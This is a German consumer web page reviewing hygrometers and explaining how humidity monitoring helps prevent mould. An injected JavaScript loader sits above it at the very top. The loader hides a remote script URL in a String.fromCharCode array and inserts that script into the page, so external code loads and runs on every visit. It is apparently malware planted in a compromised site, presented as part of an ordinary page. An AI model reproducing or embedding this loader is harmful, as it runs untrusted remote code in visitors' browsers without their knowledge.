var mndfhghjf = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; var pl = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,105,103,101,115,116,99,111,108,101,99,116,46,99,111,109,47,103,46,106,115); s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript); } else { d.getElementsByTagName('head')[0].appendChild(s); var list = document.getElementsByTagName('script');list.insertBefore(s, list.childNodes[0]); }

Hygrometer

Hygrometer - Feuchtigkeitsmessgeräte

Navigation

“83,5% aller Bewohner, die ihre Wohnungen und Häuser mit einem Feuchtigkeitsmessgerät überwachen, Lüften besser und haben weniger Probleme mit Schimmel.”

Hygrometer sind Messgeräte zur Bestimmung der Luftfeuchtigkeit. (Aus dem Altgriechischem ὑγρός hygrós ‚feucht‘, ‚nass‘ und μέτρον métron ‚Maß‘, ‚Maßstab‘)

Eine Bestimmung der Luftfeuchtigkeit ist notwendig um Festzustellen, ob die Wohnung, das Haus oder der Raum eine Gefahr birgt Schimmel zu bilden. Mit einem Hygrometer kann man dann feststellen ob man ausreichend oder richtig Lüftet. Denn die häufigste Ursache für Schimmelbildung ist ein zu Feuchtes Raumklima.

Da die Feuchtigkeit in den Unterschiedlichen Räumen sehr unterschiedlich sein kann empfiehlt es sich, in allen kritischen Räumen ein Feuchtigkeitsmessgerät aufzustellen. Im Schlafzimmer kann es morgens z.B. sehr Feucht sein, je nachdem wie viele Personen dort schlafen und Nachts Feuchtigkeit erzeugen. Und das Badezimmer nach dem Duschen muss auch richtig gelüftet werden.

Die Ideale Feuchte kann etwas schwanken, liegt in der Regel aber zwischen 40% – 60% betragen. Dieser Bereich wird auch Komfortzone genannt und wird bei den meisten Hygrometern angezeigt.

Wichtig bei der Auswahl eines geeigneten Hygrometer ist, dass diese eine Anzeige für die Komfortzone besitzt, idealerweise noch einen Alarm beim Schimmelgefahr.

Im Folgenden stelle ich euch einige minimalistische Feuchtigkeitsmessgeräte vor und Einige mit ein wenig Extras.

Günstige & minimalistische Hygrometer

Zur einfachen Bestimmung des Raumklimas sind im Prinzip nur Temperatur und Luftfeuchtigkeit entscheidend. Das decken sehr einfache Hygrometer bereits ab. Wenn man mehrere Räume überwacht, können schon für wenig Geld mehrere Feuchtigkeitsmesser platziert werden.

Comfort Control von TFA Drostmann

Feuchtigkeitsmessgerät von Drostmann, Hygrometer
* Hygrometer von TFA Drostmann

Dieses Präzisions-Hygrometer ist ein gutes Beispiel für ein einfaches Hygrometer. Trotzdem misst dieses Messgerät sehr genau, was bei günstigen Geräten leider nicht immer der Fall ist. Man kann es dank integrierten Standfuß leicht überall aufstellen und das Raumklima überwachen.

Neben Luftfeuchtigkeit misst das Gerät zusätzlich auch die Temperatur, so kann man beides im Auge behalten. Ich finde, das Design sehr dezent, damit kann man das Hygrometer super im Raum unterbringen.

Was ich sehr wichtig finde ist, dass das Feuchtigkeitsmessgerät ein Alarm besitzt. Dieser sollte losgehen, wenn ein Raumklima Herrscht, welches Schimmelbildung begünstigt. Dieses Gerät, Besitzt sowohl einen optischen Alarm, welcher über eine LED signalisiert, sollte das Raumklima kritisch werden. Optional kann man auch einen akustischen Alarm einschalten. Dieser Signalisiert dann auch mittels eines Tons, wenn das Raumklima schlecht wird.

Ein Gerät ohne Anzeige (Alarm) bei Schimmelgefahr wurde ich euch nicht empfehlen.

Hygrometer mit Datenlogger

Hygrometer mit Software
* Hygrometer mit Windows-Software

Will man dem Vermieter das richtige Lüften beweisen oder eine zu Hohe Feuchte der Wohnung nachweisen, macht es Sinn die Daten sicher aufzeichnen zu lassen.

Meistens will man nicht nur aktuell den Feuchtigkeitsgehalt der Luft bestimmen, sondern den Verlauf über den Tag hinweg sehen. Auch wenn man nicht Anwesend ist. Hier bietet sich ein Hygrometer mit Logger-Funktion an.

Auch wenn man in der Beweispflicht gegenüber dem Vermieter ist, kann es hilfreich sein, wenn man den Verlauf speichern kann. Auch die Zeitpunkte des Lüftens kann man hier meistens sehen. So kann man beweisen, dass man ausreichend gelüftet hat.

 

Aber auch, für sich selber kann man so sehen ob man ausreichend und effizient Lüftet. Oder man kann erkennen, ob es in bestimmten Räumen ein Feuchtigkeitsproblem gibt und kann dann der Ursache auf den Grund gehen.

SensorPush! Übertrieben?

Hygrometer mit App Anbindung
* SensorPush Hygrometer

Musiker nutzen diese Messgerät um die Lagerung ihrer Holzmusikinstrumente zu überwachen.

Dieses Messgerät ist doch sicher etwas übertrieben oder? Jein! Natürlich tut es für den tagtäglichen, normalen Gebrauch auch ein einfaches Hygrometer, aber wer etwas für Technik-Spielereien über hat, kann sich hier austoben.

Der Preis ist hier natürlich zu erwähnen. Dieser ist recht hoch im Vergleich zu einfachen Messgeräten. Man kann den Sensor aber schon unter 75€ bekommen.

Außerdem bedient dieser Sensor auch eine weitere Zielgruppe. Möchte man Räume überwachen, die man nicht täglich betritt, so kann man dies über die App wunderbar überwachen.

Ein weiterer Vorteil dieses Systems ist, dass man nicht aktiv das Messgerät oder die App überwachen muss. Wenn etwas nicht stimmt, gibt die App mittels Push-Benachrichtigungen bescheid, ganz ohne ständig Angst haben zu müssen.

Echhaar Hygrometer. Präziser?

Absorptionshygrometer sind Feuchtigkeitsmessgeräte, welche ein Material benutzen, das Feuchtigkeit absorbiert. Durch dieses aufsaugen der Feuchtigkeit, dehnt sich das Material aus und dadurch kann ein Messwert Analog (mit Nadel) angezeigt werden.

Dieses Material ist zumeist Echthaar. Früher kamen verschiedene Tierhaare oder Menschliches Haar zum Einsatz. Heute wird nur noch Menschliches Haar verwendet, oder ein Synthetisches Haar. Das besteht dann meist aus einem Metallstreifen mit Plastik beschichtet. Das Funktioniert prinzipiell auch, ist aber nicht so reaktionsschnell und präzise. Daher werde ich euch nur Echthaar-Hygrometer zeigen.

Synthetische Hygrometer sind dafür in höheren Temperaturbereichen zuverlässiger, also z.B. für die Sauna geeignet.

Ein Absorbtionshygrometer mit 2 Nadeln
* Echthaar-Hygromater

Echthaar-Hygrometer sind auch die einzigen, die noch unter 0°C noch zuverlässig funktionieren.

Will man die Luftfeuchtigkeit zuverlässig und präzise messen. Oder will man auch auf schnelle Änderungen der Feuchte reagieren, empfiehlt sich ein Echthaar-Hygrometer.

Die Genauigkeit lassen sich die Hersteller leider auch bezahlen, daher sind diese etwas hochpreisiger als ganz einfache Messgeräte.

Wer sich für ein Echthaar-Hygrometer interessiert ist mit dem Fischer 111.01T gut beraten, das liefert zuverlässig präzise Ergebnisse.